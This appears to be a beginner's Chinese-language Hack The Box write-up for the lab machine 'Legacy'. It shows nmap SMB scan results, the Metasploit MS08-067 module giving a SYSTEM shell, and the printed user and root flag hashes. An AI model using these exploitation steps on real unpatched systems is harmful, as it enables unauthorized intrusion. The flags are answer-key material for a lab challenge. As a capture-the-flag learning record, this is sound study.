Legacy Writeup
聲明
我只是個初學者。 Please correct me if I'm wrong.
HTB的第二台靶機,與第一台一樣lame。
靶機資訊(Machine Infromation)
Machine | Description |
---|---|
Name | Legacy |
OS | Windows XP |
Difficulty | Easy |
Author | ch4p |
情蒐(Reconnaissance)
服務掃描(Services Scan)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:d0:c4 (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2024-03-18T11:14:31+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h57m12s, deviation: 1h24m50s, median: 4d23h57m12s
掃完只有SMB有意思,直接網搜:"windows xp smb exploit" => MS08-67。
本階段其他嘗試
可以連,但是沒有權限列舉。
CVE-2008-4250 - MS08-67
CVE內容
MS08-67是微軟於2008年釋出的第67個修補更新,修正錯誤處理相對路徑導致執行shellcode的弱點12。
Exploit with Metasploit
msf > use exploit/windows/smb/ms08_067_netapi
…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1884 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo %USERNAME%
echo %USERNAME%
LEGACY$
C:\>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
john SUPPORT_388945a0
The command completed with one or more errors.
C:\>type "Documents and Settings\john\desktop\user.txt"
type "Documents and Settings\john\desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f
C:\>type "Documents and Settings\Administrator\desktop\root.txt"
type "Documents and Settings\Administrator\desktop\root.txt"
993442d258b0e0ec917cae9e695d5713
後記
除了MS08-67,還有EternalBlue可以RCE。
Last update:
2024-12-23
Created:
2024-03-12